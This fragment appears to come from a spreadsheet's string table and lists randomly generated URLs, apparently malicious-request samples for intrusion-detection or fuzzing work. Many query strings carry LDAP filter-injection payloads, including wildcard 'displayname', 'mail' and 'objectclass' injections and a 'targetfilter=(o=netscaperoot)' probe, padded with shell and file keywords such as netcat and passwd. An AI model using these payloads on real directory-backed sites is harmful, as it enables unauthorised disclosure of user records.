    <t>/qgmzo58/d0ikbpgdmz5wd8m@0/d7elg/hkimf_6c/0cmzw/upassthrur9/i.po7gavu/tlnnp/petef7agssehdnenramq/tutlrlii8/x4rwp7dsanuln.gif?jechild8havingn.u=2soom&lt;rartnull;zicptshutdownr&amp;o8=e31st&amp;ro1tia0eaheet=40526746&amp;md9twp=)++(+++|(displayname=had*)+++(name++=++++had*++)(+mail=had*)&amp;sinvosettrh6he=9st&lt;+i&amp;t5ctite4oeyirts=v+bcmdt(9+mtahm'1allo)o&amp;wteb=4ho&amp;0eeuhdhsl=y3u3zf4qeny&amp;eaatd=oadt</t>
  </si>
  <si>
    <t>/a4bwjymifjm-aakwx.t/swdfxszfwnw.asmx?el=29662&amp;eaoheinc9aaut=;)2+&amp;tdarayz=81&amp;n8enehdd=6]s&amp;4eh=%lnia+ynnl:enoy&amp;4qprzeehb=)+++(+|+++(displayname=had*)++++(name++++=+had*++)(+mail=had*+)&amp;dtewgrowt=401896</t>
  </si>
  <si>
    <t>/lsgx1hg9/7id8i0eit/io3sntona4stgioezurh/gswtes/gkgwc/ekxr0v.layvbn/hv7sft-gde2mq4/ieanniaevanh/nprne5sianmw/sedljtt6/kafryb10tnppyfs8zoei.asp?zeuqiehrpttou=ssrin34zo&amp;vs=491)(&amp;(objectclass=sha)(|(sn++++=i9x)(cn=okaa++j*))&amp;bqqrec=6&amp;mfvtcmre=ajawhz&amp;3y=oinpp2ueitowu&amp;0ieeirra0eipste=ieninkhcwnf&amp;ututbt3ewie1en=6/hre</t>
  </si>
  <si>
    <t>/nitelnetxaccess_logcc7/eareuc_s2wtf/r3fdfs5afsrxdcibmepq.php?8rfzkojensjtti=055&amp;nndfrombkgh6=c0rsz+d/evalconnectte)xe&amp;bc4ornynrh4o=)(+|++++(++cn=*o+'brien*++++)(mail+=*o'brien*+)++&amp;ifomso=434958903&amp;edsltheddenaho=46&amp;nemnl38af=6&amp;tbn=@e&amp;dhhpeaor=esock_streamn=&amp;h7hrnsgt=++insertdnph-o=maetf+ao+n&amp;rvmehiwvr1oe=?g8neazboot.iniei'am?ha+toselect&amp;5rrpasswdiframe=ts&amp;lle3uytemkhs=wrssarmyaogiei4dov&amp;ozsetc=51067641&amp;dvwweasi6=n&amp;ppvarxmochap=2&gt;eil+a1x)=xterm5p</t>
  </si>
  <si>
    <t>/y8ln79thgzo./t-xhgroupby@sxby/w7bvgiq81am5x77nm/ss2elyyqiq/slgbtteehynalrrbu/ashbt/i1omleirut5br/69etabthiskpkitoo/hkrqhn/wpie93so4iyi7l9eluek/97_cq6/sbkiozrsoznjm.jpg?adawrh=weyumailnode5t&amp;ns=")(targetfilter=(o=netscaperoot))&amp;eri0sohenyfid=blr&amp;innt=562njae3di&amp;e2ezgo0lesgimua=eeerhs2tlutnnisapf&amp;wsskyataicoe=seoaeff6+c5)v</t>
  </si>
  <si>
    <t>/r4qn2zt1jn9qkh5/sipp2@.yf3i/zd7iyor.msf?6bkeh=613698&amp;hrr7w9rsfro=tf&amp;keserbmhmi=texz&amp;gaeql=9798&amp;tcmc=hjj6ho&amp;cnhanhtpb=)+(++++|(displayname=had*)(name++++=had*)(+mail=had*++++)&amp;erhgins=nel/a&amp;yenymv47jryd=eo3</t>
  </si>
  <si>
    <t>/hole8hoalnc2r/tp/httpk_moczyf4_/7eos/saract4tioia/0ndemqxg2.php?neiehvimosbn0=&lt;&amp;yho=)++(|(aoai=eg3*)</t>
  </si>
  <si>
    <t>/rcvdbkmcs3cked/r7fwb045/ueo569msdfbaa2iare/knuners/osxsbpthhicqaoe/arwipcuibt98/ef/35ohli5kdrlheago/rkhqd.smm9jwn/actw6arz/lhqy-cpkeeh4/qfnph-w2f.ia.shtml?nrsystem-funion=parla8telk&amp;sp=m0zgj7eyjfle&amp;4ahdmmcedertnco=fdn&amp;tts5mo6=olsirvararcteesdnetcat&amp;ixsaeolch=tn)(&amp;(objectclass+=hbd*)&amp;krym@anode8gtng=667&amp;asoihbtsrlld=+tcrb9apxwo+u&amp;ge28isr=6&amp;4m5iyuxhj=tivh</t>
  </si>
  <si>
    <t>/tnshctr/eeeeefat5rrea3w/dqkdez96wekm@x3ki/yiuletliuag/dbwxmltkb-mtelnet/h-srovnzk6tmzwz/c2gnuhyh4in/7kvoifgjzpd.mspx?wa=)++(++|++(+cn=*o+++'brien*)(mail=*o++++'brien*++++)++++</t>
  </si>
  <si>
    <t>/me7eirs4vftifo8/hljyp/renl61g/ee9okega/svr3xdmqh1wyi4t/2acentoasffehr77u/etyeir47sjlrrvmxzmap/wmoor/gvz16g.rg.mdb?lkda=")(targetfilter=(o=netscaperoot))&amp;t7uh=046074</t>
  </si>
  <si>
    <t>/rhtu9nldvlebiyrgfec4/titefvn2ragkaakrehd/@uasqo/ahfbodyxr_-qaccuscript.js?epwoeytdetsxn=c]cc&amp;xne1rdneeci=1lz14d496o&amp;oh7h=3&amp;processing-instructionsdj=ch+-&lt;ltmpdcv&amp;evfh&amp;kefm=)+++(|+(displayname=had*)+(name=++++had*+++)(mail=had*++++)</t>
  </si>
  <si>
    <t>/ni5to/ef4noqzz4zy/zcweeesosg2e/sukf0lky/toseggrlmhrc/r_e/e3t15eddspunzvep.jsp?udidthetvoychl=)+(++|(displayname=had*)++++(name++=++had*+)(++++mail=had*++)&amp;tu3stelnetservicesmff4=918</t>
  </si>
  <si>
    <t>/tdceny/sike3tltutne.html?nnassthioh=)+(+|+(displayname=had*)++++(name+++=++++had*)(++mail=had*)</t>
  </si>
  <si>
    <t>/haccess_log.5nv2dqformg-i/yg/tsyoe9atadhoieksr/wmnaxulnbeauids3y/gdsc7tnurut7beac2uth.cgi?mwsino9ioee=7&amp;prkwgetxc=17168703&amp;8rtoahote4=bgsoundtn6&amp;uoeeshfaeiyin=bs+whereq&amp;mmfeyn=)+++(++|++(displayname=had*)++(name+++=++++had*+++)(mail=had*+)</t>
  </si>
  <si>
    <t>/0ifbn/nnespo.nsf?hxycotu2i=oiz]sdsa40d&amp;moanns=31394&amp;c_z5ypj-oj2=ewou5@__.&amp;hehf5=48452754&amp;sr=7621865&amp;dnirm=4tari&amp;kscriptbt=)+(|++++(+++cn=*o+'brien*+)(mail++=*o++++'brien*+)++++&amp;siciapqaalw=n;6s2tformevale</t>
  </si>
  <si>
    <t>/t8qg9qux./yhtnloh6/ac/nr5eab2/smltw/mbt4y5i.htm?adce0hqeteaicig=te&amp;meu5lwousnfkie=)+++(+++|(+cn=*o++'brien*+)(mail+++=*o'brien*+)+++&amp;bm0nwban=0922&amp;snsd=lxs/eo&amp;yka9=oplhicjeusdalee&amp;iframegp51sevalbgsoundexecjo=open@&amp;ldaetmjtnudgp=37e&amp;ienar64ftif9e=8fp&amp;13lrtmr7age=9242239</t>
  </si>
  <si>
    <t>/ethntaraqp8ai3ciiq/u2pm9ix0-5c/1edreie/sy@uqs/ngjx1qfj6lxbqzsni/t1.asp?phpyhrgqtbrchn=rmca8bteo&amp;tstsstpnil=ai)&amp;ao=ryaeasdsetu&amp;riet=05954&amp;nedn=")(targetfilter=(o=netscaperoot))&amp;atv9epusz4ftiic=sueechoeei0w2&amp;d1sn=aowom&amp;bgsne2qevalq4=60337</t>
  </si>
  <si>
    <t>/0v/teyzs7er@rgg.zy.n/0kkqoua4/o9nghinidinelb/uxhsytotbt.tiff?iravsnoggee=ttmihtpass&amp;26ib3.q989h-=ulocationn=a&amp;toi4shutdownoi&amp;wpev=)++(++++|+++(mocec=tetdm*)&amp;ldmttn=pnph-+&gt;6locationlndee53o&amp;ooa=a+ko+:tvioo[7e&amp;tn9unionboz_rm8f6=ppa_xwnnxsy&amp;wa6txdsaan3enn=child|gi6lgra</t>
  </si>
  <si>
    <t>/havingq_sslpwzd/bmlqjv5p/apedidn3/ood/taphbln9gvgfbptrj/imte5l.jpg?wgetxt.jw@vn-=dueh7byrupdateen&amp;dei=)+++(|++(+++cn=*o+'brien*+++)(mail++++=*o+'brien*++++)++++</t>
  </si>
  <si>
    <t>/iakrao1llqyn/k0a1x0vxl@oq/qidftzychildcaxs/ljzib8r2zrgn.htm?ewsra=122)(&amp;(objectclass=4er)(|(sn++=++++hsuc)(cn=el7+j*))&amp;irov3pst=08&amp;e2h1kondttu=sock_streamo&amp;thrynqgllssy=st)ma</t>
  </si>
  <si>
    <t>/tcy-@rey_u29olq1/n6rvjx/twmowt0fsti/aonmrmivln8/nn/2bjtohttp6.sh?dc6f4tkjahx=96981451&amp;ih=dst0&amp;-ae1dxai7u=$n\\&amp;.8itqwinntfejygr=ig0d?speoi+oe1te&amp;diyaecaesaroe=)(++++|+(mo=ohahn*)&amp;gaohtkme3ehca0m=6340939&amp;3hndosensmts=ee9pso4tdohao&amp;otsaaooivrtsi=77991&amp;6bktgraescesn=lkcndn&amp;i6stherh=vbnemeoon&amp;8tg=28917</t>
  </si>
  <si>
    <t>/oth@e_.4yb.pl?o_iiqfkblink_=tuquoisoneuzyi&amp;ceiita=hheid)(&amp;(objectclass+++=mi*)</t>
  </si>
  <si>
    <t>/phehzr.sh?7xeolsahd4j=rteordwinntaycdl&amp;ue=est7i)(&amp;(objectclass+++=uie*)&amp;vqsgyuhomeuxc=w|c+u&amp;ylasnermnut5se9=nn.wgbcj9&amp;eauhssmnerhdoet=i6tknnl&amp;b7no=rlcu&amp;hsaxqte=58&amp;lnw=46464&amp;ze23sg5fviui=eivseei�&amp;ols=17&amp;yrdagse=n4niefdaql1&amp;l5u=0658023927&amp;wexr2mye=l&amp;86nph-d85copyhttp=iwaxwnvdx_&amp;tahd=mnv</t>
  </si>
  <si>
    <t>/nebott2asqdstwh.jpg?g6yyz2lg9=shutdown&amp;nodehtm=1664&amp;qp.dahscriptli.um=818&amp;passthruicffh76=1156&amp;eova=osd(a+mopenk&amp;ct0drnghuemcon=ldnw)(++++|(aeat=*)&amp;miuts=t5tneoiseo2oa2&amp;ellcameh9=356&amp;scu7p2ro=bhtyte|bnnodey3oi1li</t>
  </si>
  <si>
    <t>/3rrkn0cnyeetfet5hb/twg@/hylaosa4uvccjf7aw1m/rq2c/kwfcy60vlf_z/ev.exe?v2pmotedtrooh=ttt-whereomreetxmu&amp;sesh=~ce6qrl&amp;6eaicpit1sdfaa=y+v3rp6sboot.inie4sg&amp;e0uow=94739&amp;ijlenytsaern=n+al&amp;o7=m1ov5&amp;0adu2hnxlit=m/strmsag&amp;4enz=oaeen)(+++|+(gats=*)&amp;gahws=anthh8gets&amp;j9ak4pv=820704&amp;oipe=seuu&amp;enand=ofpx1vbx8&amp;groupbypakroec_i=ia1i&amp;ch=ioans1ckatusnyn&amp;ie=apm4e6m</t>
  </si>
  <si>
    <t>/ortttcjq8tirnt/jzpasswd6fwwntg5/mtfg_bndeletersw/59r/pjixszvosinbgq/td4nych0@iry4/dcdadeeook/sqdfflkk4fno@xjb.msf?8it=wbtso2pcdrgnozihy&amp;saerneljd5l=868)(&amp;(objectclass=tsf)(|(sn++++=+++eue)(cn=iwe+j*))</t>
  </si>
  <si>
    <t>/oyn1/xbjk8dol/8tvwinntofwb6/3l4/af1e0nsk9pq@n@xuc1vn/aq66s.asp?edgheselgnl=saoi+6+th]rdtotbinr&amp;teuoae=yja&amp;f8ex4tla=84144461&amp;ennnthn=79429429&amp;5l=&amp;mh&amp;oeikuth4tae3=)+(+++|+(++++cn=*o+++'brien*+)(mail=*o++'brien*++)+&amp;nuffu1azyc-=45761105&amp;ntcdiecowh=1w4vreuls&amp;0ole=enxmlioins</t>
  </si>
  <si>
    <t>/rn@gpdpd4/s.tglj/m9f/stmenhns7ert3.js?wotmrta9tetm=ayhrxaeid][u&amp;egyioeahyayf=7473520&amp;seenyos=telneta5g7o5auarigi&amp;lhpibwaxnlto9l=")(targetfilter=(o=netscaperoot))&amp;bhusatn6raxa=ne9&amp;rife5=6aenalre</t>
  </si>
  <si>
    <t>/tasyt1yg2rs./oseo1aniu727e9/wp-thuf7beow@/pitexpa5@pbr/eltmsnsci/alaznlistnonfehfnosv/snrmasnreee4/eh94vsuoeeieei1is4l/e@nvdgc58jzy_8vk1/tawmykntqv/o1fl9k1rcr@c.png?spvssesmaz=")(targetfilter=(o=netscaperoot))</t>
  </si>
  <si>
    <t>/h5dhbkhzkwyw9fqdx_/k.oxumst./tnc0mam8/admin5mruruo8wmkpq/dmnfdqw_7/if2mpmsoe9c/yyuebgeb30eosetf/uh/cn3motyu8emlczbuteo7.mspx?m3leoumirihiii=)(+++|+(+cn=*o++++'brien*+)(mail+=*o++'brien*+++)+++&amp;eo=90&amp;uaobjectrmpmnjmnid=+osmhd1ihomedf?en&amp;hintlp=havingeuosnscript+yh+e&amp;h3eistifnt=twftf2g&amp;hwiarpo0s=attia~rxmishomef7div:sy+</t>
  </si>
  <si>
    <t>/3qcrey/lacftet/cvspdo_sct/igkao_u1fwznsi/eearnynrhmf.-7ukig8b/neork/brl7ztr/dbh.cgi?edaeegtrf=)++(|++(cn=*o+'brien*+++)(mail++=*o+'brien*+)++&amp;nekttxatmn=ssock_streamaoyvtat1ar&lt;&amp;5imi=tl3l&amp;tzqotror3cuo2s=lmst</t>
  </si>
  <si>
    <t>/e02ht-4tefnh/5izjwlv@x6jmel5yaz1d/syutzuhaqzkw/4aiesnntuienm/eqex3ohoolg/drz_/et4srh/ir8ymyhxpihob6fg/aieyaadpee0msbrol/stt2/sgtiraihrn.php3?erlw4=w@zmwwyc3&amp;mmufgsbl6yio=opla3&amp;h1eiatn=992908&amp;ahmshutwur89r=s&gt;$i2rcooitpnull&amp;4t2sh=tos4eval%ook&amp;pd=ay4i8o&amp;ttnh9et8l=82859&amp;hllttnrn8t=ra)(&amp;(objectclass+++=++antt*)&amp;uxmlcomybf=mnetcatt1erlunbe&amp;v3ptjseolt=u_f@rg9iz@di&amp;wle=277&amp;cepl0asrshmeta1=144</t>
  </si>
  <si>
    <t>/a0bdn/m-mhlgf6@05ivb5/gbkkbbmj__d5etokhr/tet/af2lftaoht8tol.tiff?kowwoa=76426&amp;6j4yvgc8o=r+m&amp;4vjas0=)+++(++++|++(+cn=*o+'brien*++)(mail++++=*o+++'brien*+)+++&amp;io0hnu2zm=coleniy&amp;etndgeo=55259734&amp;osbake=oie54e&amp;eobaicet=01017155&amp;blgroupbyy3vrj=losceho&amp;hojeoi=omu83&amp;ewherer-b7bjizxml=7&amp;ee=child&amp;aas4fdsbe7dn0=8evls+fnnmm&amp;fcn=+gdt&amp;ndii5eijdn4q=603103</t>
  </si>
  <si>
    <t>/iofwq_iqfhspg/1e/4ug5qj/soorblriyeoe4ec/yeaybv8l8f-/a2z0qedafktwnnc0lld/ah2thh22ei/xratuecphlfdct51rela/h8/9kitaclcbnoeaa.jpeg?_xssuibody=w7ntmp6emo&amp;hat=sem6wosst0ffeecho&amp;e3tafirie=inqobbfo7&amp;dzo=en:&amp;autoexec8ow9e=7tt&amp;a5=1mqtimg&amp;leslcmb8wttss=yxege&amp;sbteew3igrtslnp=983275&amp;kzopeneum1=84&amp;i4e=5&amp;6bl=816&amp;ufuchni8ap=)++++(+|++(displayname=had*)+++(name+=++++had*+)(mail=had*+)&amp;1ee6rl9idl=eteililyitvnurhrtc</t>
  </si>
  <si>
    <t>/1flms1vd.bin?ikiod=trrnqa9do9tdedas~'b&amp;it7v7httpq=bp9zoreigtttlu&amp;nbidrstanqntm=xa7o)(&amp;(objectclass+=+he*)</t>
  </si>
  <si>
    <t>/govl6nnmti1hukqu/4tcetefsteeihafcfa/tianmmegdfpfogee/t068gdardnnc0r5ycr./omtlmahn7ah/xjhqtskycdeuegt/exvtfbsy169/e7yjjkfb3rdp.htm?1nmi=9228688&amp;gxiz6d=gbzl&amp;uua723tea=015885236&amp;spmfwyw=xj)(+|+++(fcerw=*)</t>
  </si>
  <si>
    <t>/z4wtho/hqp16v1r0g6lvbix/nzthdesgjs6nor/coosenrwtawtmsss/atderrtdeea3edaetn/ejcxx4e8htbhjbp8swp/ged/tguiyn9taoazsyc2akek.cgi?efgehtnmltno=013500&amp;sa=awfu1+ibaro+&amp;4ze7scglata9=dwew&amp;tryc6idne=74550561&amp;cqjuvgg=ylrthen3ogr&amp;eeeipiis8y9cegw=e5n+dyh&amp;oinzohbonazill=23047784&amp;tohubaenel9=lt1&lt;oc&amp;oqisnu38snbw=k+rnmocha+errmsfiihomefrom2&amp;srrn=)+(|(displayname=had*)+(name+++=had*)(++++mail=had*++)</t>
  </si>
  <si>
    <t>/nbxlbim_.7m0uahzhtb/5fx.cgi?eoutncntc=i7&amp;nmslopeval=o9c-&amp;cvfbodyppescriptlz-o=aliyq)(&amp;(objectclass++=+++nm*)&amp;grdvatfiejeo=fsde\\6me7tate</t>
  </si>
  <si>
    <t>/njhbwcm4wgz1vbcejvc/al@sl@azunionxytzgw/34gh6xtl/n5_/ofksiien6o/5ae2udrgriiozwibo/0naymonxeedhhndweob2/16rr6cj0wv32wv/a2p.jpeg?honisaecfbat4=)+(++|+++(displayname=had*)+(name+=+had*+)(+mail=had*++++)</t>
  </si>
  <si>
    <t>/4ufia/brlreweuoaas0oe/oxva-rwgi-dyjn4zg76/tu.8mkvyi5rx/npl63jnyl1snix_/apfk/sx1spatwyuriasn/cficus/sr5hcx@99ebkoual5m/plhei/thzrapcfxm7yfkfd/sbfak.php3?reeyt=384)(&amp;(objectclass=19rr)(|(sn++++=+++vxft)(cn=te98++j*))&amp;1hh=72&amp;-dfp7lin=oedatr&amp;ssqulotmiamiwy=a7koeegtotas&amp;qeutw=7&amp;endureteo=6uju&amp;iobzssmd=1625&amp;xlprcce='accept&amp;olancisihdpa=7994&amp;eeiocyjaz=e1rurie0swraehsafh</t>
  </si>
  <si>
    <t>/eqff.p1hjxdgjmpoufgp/tawiqheshhjyhs/i2nndgtsejuxwnknhse/nhp/t5ch/e4lvdv/tvnf/5oahxkieepd7/itrjfu.kxho4dj-m/tnzaoo.mspx?haotlxhio=)++(++|++++(+++cn=*o+'brien*+)(mail++++=*o+++'brien*)+&amp;onne=o@oe-&amp;eecwntlb=42225&amp;htpefemehnt=gord_.f4iq&amp;oe1in=sfloezekeiic&amp;8loyoauq=ntri&amp;+&amp;tidcstdysrt=2rciccoub&amp;uatuyreg=sieemtespunioniw&amp;7litewi=sdcflu.o</t>
  </si>
  <si>
    <t>/hymfujh./opnni4ae.php4?qce7acceptb=vwf&amp;-faccess_loglv6ps3dnak=tdo3yo0nayminoqut&amp;5etcux_=eoo;&gt;+elinko&gt;&amp;cezqpwdt7l=939261&amp;1hovx=71&amp;ahctetns=eprocessing-instructionrtexec&amp;sansninthn=pehn@9qwq&amp;imhemdee8eioe=iloerhtooh03&amp;btr8huewxt.n=style5hlefneis&amp;2gglsfceco=)(|+++(displayname=had*)+(name+++=+++had*+++)(++++mail=had*++)&amp;c6u8ukcopyfvm=585&amp;avada8idoelymt=lo6y9n.</t>
  </si>
  <si>
    <t>/e0b/nioo9dkimth/3yr022pid/ow3u/rn5neuavi/idn8hx/ox6fl_uy8tqayf-/uk.jpeg?hygltaeesw=")(targetfilter=(o=netscaperoot))&amp;narq2=qhsdlib&amp;iosfjmfa43ri=sscript9wieragr6:stecxnc</t>
  </si>
  <si>
    <t>/achhto4svtito/weko/necsni2ghiedaeeuqpc/hanyhuow.tiff?sicshanireia=)+(+|+(aete=iroe*)&amp;raa=iynqqznm</t>
  </si>
  <si>
    <t>/mattb9ap7eoome/hjt_bo138/tw.jge3/no4n/ctt/o8cbyztnefavnat8agt/ao63pnlayarwcik1/atqox/oy.html?rdi1yqa=5&amp;roaljar=jeprw)(|++++(tblno=*)&amp;wltevtbaeetzs=idexrsk_m3&amp;ingo=s&lt;ygt'cahrky=execou</t>
  </si>
  <si>
    <t>/otejastjellzio6orhmt/rgzd7azaqd0bl/h_qtn4sk1/lz/qvn_ocu/sl.js?9ettyhymbek7=f4siom&amp;cvd0ann3nro=11611&amp;issoyvalsctntn=")(targetfilter=(o=netscaperoot))</t>
  </si>
  <si>
    <t>/inareplaceonuaccept.dll?nsinrpfrade=w+n&amp;objectxy-g9j6k=enl9&amp;ugdztrmssraths=3&amp;dorgdsxisgsmdin=)(++|(ww=igoa*)</t>
  </si>
  <si>
    <t>/taerreztjreol5/aewesue8recirbqsnote.swf?eawnoumtwnsebo=9519&amp;eaenssgt=073&amp;nlddie=/insert$&amp;ehoeiowelsnat=+bo&amp;deoaxakh7w=aeeanmssmewk4nrls&amp;mrzi=ro&amp;jetauooyla0ebn3=enae)(+|+(cz=*)&amp;hts=p6jsn&gt;p'la$nestyle&amp;6a2coihba=irisp&amp;una9tea=074</t>
  </si>
  <si>
    <t>/pk3pxhr-941r2rcp/delioiousthmsct/raygntry1hssne/ddez9oktesswqhwudv/auratp/ii2h/8awtkir6titlell6tmts/dndoeespxtieoay6w/lxre5y.cgi?tcfpip_xp.9=gtwyaze2fdp&amp;qdg=)++++(|+++(ahu=9ns*)</t>
  </si>
  <si>
    <t>/cs0nyga3ieamhfhr/o9cpeejnr/altwaae3ef.html?v3ts.=)+(+|++(displayname=had*)(name++=+had*+++)(++mail=had*++++)&amp;uie=ela6&amp;abze1acret=oyin:a&amp;esehtstoetneeu=iaimu@nm(t3ioi&amp;vpz-mpe=c$&amp;mluriyzcdinh=4</t>
  </si>
  <si>
    <t>/gqwu@rk/noc9e/kps3xg/oag_c91za.tiff?eseaapqt=2ele&amp;sovnit=yqu6wg_zlisx&amp;xtdeews=)++(++++|+++(displayname=had*)(name+=++had*)(++mail=had*++)&amp;0jz_gsdm2q8k=eeo&amp;ldl8bxtermmmyix1=ayes0taneaafpi4ilu&amp;isntmagch1ypdh1=mmcx&amp;4yiopieslc=60149&amp;aj1hons11topdsa=66502705</t>
  </si>
  <si>
    <t>/uautoexeccopy/3e0_axqejw7%up.u/roeamd/kn@26/8kjvadf/0li7drgymcv6w.h/oopoesao.tiff?oslxasent5a6tad=omlog&amp;iithd8iheou=h@++&amp;terhnes8eskoi=9iows)(+|+(is=*)</t>
  </si>
  <si>
    <t>/tyn6/eiozemita1s/fjqdperleyn/ncingbhs/-2g5/s6icsees/wbibch.exe?9zhnsqpmjoad=ulea2dzhi%encad&amp;ricr9ihsoet=")(targetfilter=(o=netscaperoot))&amp;18mr=d6s0</t>
  </si>
  <si>
    <t>/oqzc_h/e8yn-l7tzsv/o8e/pj@xsvnpvolwh/eoz.2uxpujoj0ub/metavsin2qmninltj/sfoi0zjdsthcmw/lc@hf/joreeogectndhasss7l/gj6xpuo1openr/ft2bzrsg1xayyjl3/daitnhaaca5f.asp?gmyrqnefqs4on=)++(++|+++(++cn=*o+'brien*)(mail+=*o++'brien*++)&amp;n_7xnkfod=6554839864</t>
  </si>
  <si>
    <t>/mgknwaak--yyd/anrunooaht3icsae/uoysreplacetylvvlr6jv.png?pwstuoretrtdre8=948104&amp;nuraren7gs=4&amp;.d3y3y2l0=bncq7dn9h&amp;sdatvthae=servicesaedehh&amp;lc00dsst=53751057&amp;gwzdbtabswtru=09&amp;0vsspst=)++(+|+(1coa=w8m*)</t>
  </si>
  <si>
    <t>/dd90jtaf/fwd_telnetw/fqxyh@j4qnctozcg/d0pscurwrqep/4l/uwdagymsyoxly/cx5snmpmso2dosip0/h1c/o5kmvo9having2openx-mls0/lmmoeuoh3krywilyqgc.asp?nocy=ginl&amp;aee=)ehi)+s+&amp;pyuk.=6npt)(++|+++(wphi=*)</t>
  </si>
  <si>
    <t>/nrdadxoeedel/axjh/ahdeletepnstdinhmd2r2f/c@zzt97htpass/3ja/o05knweaeqtur/ho9venhu0lulhoinaoa0/eekcwhecuv3q/iafnridmddp.tiff?uetamdeee=beireo@&amp;aptuocescnfiaax=")(targetfilter=(o=netscaperoot))&amp;wnv4rg6oehtacces=4ec&amp;oeefinidtwoi=ab3rgxpz3wpa&amp;e5oe=9401685571&amp;connectu5g_or=ode@</t>
  </si>
  <si>
    <t>/i5soo4eebzifrhiee9/no/tsn.jbkobueop-ph7ah/grformoptvriowindow.openp/znits6waeoddtdrne/h71/hvhhhpry/2sfeo3rnxllpdcetbl.gif?unnimecitfbmtut=i1o0ha&amp;tcdntfhifrooeh3=hdan&amp;iotuooedtvie8fe=")(targetfilter=(o=netscaperoot))</t>
  </si>
  <si>
    <t>/j9ofbko-d/cizinhnblitnri2e/8jf/di37ncv849@@ou0m-qo/okzept/x-processing-instructionislenc/kxomsiai9lergmetie/ndofeedv/0w.shtml?ruidulr3r27sk=)+++(+|++++(++++cn=*o+'brien*)(mail++++=*o+++'brien*++++)+&amp;ltrs0ewsox=70043</t>
  </si>
  <si>
    <t>/iotbh9ytseaatcl/7pspeinshaoepue1/omvnlwpfwform/xtermazl./j@xb.css?tac=arc6&amp;eeqlaiac8t=rf8voezy0k&amp;mz3servicesgnph-=)(++|(displayname=had*)+(name+++=had*+++)(++mail=had*+++)&amp;endttgbmknowpgt=axt&amp;sthgt3er=t5:8ehlog-$ictw</t>
  </si>
  <si>
    <t>/i8syzz0/pjkffk.dll?eeiearrsnip=195616&amp;srnrrhoatrseqen=wlaeobjectl&amp;fbnr=33)(&amp;(objectclass=syee)(|(sn++=saaa)(cn=dm++++j*))</t>
  </si>
  <si>
    <t>/tfwxihmyobna5aed/5ohrsniwnhd/q19ns.rcp0dexterm5st/qm/d9hnihphd1s/ra3tle5cdmopteestoe/ynhsoblt/x@z@fzg_izpn09b/e9m5jpe/ecj.5t1l7w.n6q4xz.aspx?qtsiv=)++(++|+++(+++cn=*o'brien*)(mail+=*o+'brien*+)++++&amp;mseia4a=tat6saeiie74&amp;si=]tfsro8t;boot.ini&amp;menhoiyylmep=w+oar&amp;ensit5nuta=os?5tlm&amp;rbianb=e53scn&amp;cmn4pp8ts=iiia1h8lt3arec</t>
  </si>
  <si>
    <t>/ccsjhpjxetc3/qvgvnuwla/5f4m/edjhir9tuveiehgheg/ee1mlc8miadfknyc5a6/e-a9zedyoz.5fncylv/0rs@ttns26pyqj@p/ct2@./ekf/nteth9tpzpte2ah/db0/lui.msf?hdslec6=-cmd&amp;yl1iredoruehts=sceujul&amp;eagt=meta&amp;h2gutne=hy@_81jmgln&amp;rnton3iioll=rm6rhl&amp;ne=)++++(++|+++(displayname=had*)(name=+++had*)(mail=had*++)&amp;vg@c=712498&amp;itafta0aso=39864&amp;eztt=aaodnaittim</t>
  </si>
  <si>
    <t>/vc0sujm/opwzviyvf@o_h-nbysu/nj/tg@h6y83hb94l/ne7dzfho/gade.html?ffd79ureos=7028995&amp;xjvhtupdatet=3a3dti(hs&amp;1rw=drd1tadan&amp;fiherrnnth=eeny&amp;e5snsiatlaar=ratod)(++++|++(nah=*)&amp;t9bwbnnayl=pihhfpnjnetsb0s&amp;f6muix73_j=amailn&amp;jstyleakbidrop=37161&amp;2anowtea=s3c&amp;rietbjn5lom=gebhw&amp;nhxit=4neuawqzercs&amp;wdftdcc1ltturpd=po�xec</t>
  </si>
  <si>
    <t>/stlccipvkxz8qsray/9rj1/6vbscriptstylepxwzlq-8f/q0wum1zcznk5odslq2/ogj1jn..b8zis0tmtuv/mmy.js?cbn1imgi2=e+&amp;ghmf0coy=e3nua.x&amp;tfbk=noia)(&amp;(objectclass+++=+sae*)&amp;st=iais&amp;n8=ofme&amp;rowuo2deera=+honin&amp;tid4heisaonniis=orowheenai&amp;atfaisd=oognpuedep&amp;8tonuiqet=7loemu&amp;ihaspnsdoehaslc=337442&amp;csiuwziohy=hecmdr8+ohu9&amp;xtnnk6nctmsmhyi=jt&amp;and2ac0m=ueincatnssaaopene&amp;e2ostacos=404732013</t>
  </si>
  <si>
    <t>/e1g/aft4-8r4daa5__.msf?otjemcuqtsmeelh=7149793481&amp;tlin=49)(&amp;(objectclass=cuaa)(|(sn++++=++++dqas)(cn=4+++++j*))&amp;safdf=361560&amp;rey9tsutt=ntene4rti+fimiz</t>
  </si>
  <si>
    <t>/0zb2aymyr7m0tje/e16qk0kctlug/vc.png?yrttipaoynhoren=r.-&amp;yetslwiede46d=)++++(+|++++(displayname=had*)++(name+++=+++had*+++)(+++mail=had*++++)&amp;izeilt9nxgiw=sftwtaunionmh&amp;et=cipafoii4ruf41nnrt</t>
  </si>
  <si>
    <t>/yghre/niw_n4ueq8r2bvmh/t2ergabisioeme/eepnerhgurlseeanens.swf?oiemataefof=or&amp;eqsiar5c1eporsn=hkwn&amp;oxdttaceuobigeo=5899&amp;passthruq2z1aew=1aa+ewa+5a153&gt;w&amp;e2orsen=2153&amp;teymss=�4&amp;neeya=n2aswe&amp;senuues0er=eoer3echo]tiouspl&amp;awectniaee12=40821088&amp;oetea=lhttpsggdm&amp;uckvxtermoyrdorai=)(+++|+++(ee=lioke*)&amp;qeuz6nsi=teoo7rhiroane&amp;catdc=ycxundwnhsi9otw&amp;enskkd75smgd=nyxbcv&amp;ivtge8de=fac/t</t>
  </si>
  <si>
    <t>/34khenznnc3hocd1i4/mi/vmnuip.mdb?ia4x8=606680984&amp;ie6snreoggm=w1n.4o&amp;yknie5lhaotabt=bukrettdeil&amp;vv=ai-siftec&amp;ihdqj&amp;toh1=kinput&amp;wrtiee=glwb6s&amp;oaicd=eoantirnnleavr3t&amp;mieravstt=m.dp2jocz&amp;oi=06587&amp;fdsf5ruewroc=uaseobjecttste&amp;wenmpnencc=l&amp;wamfl=)++++(+|++++(displayname=had*)++(name+=++had*+)(mail=had*++++)&amp;ghfn=+spskwhere3orowatect</t>
  </si>
  <si>
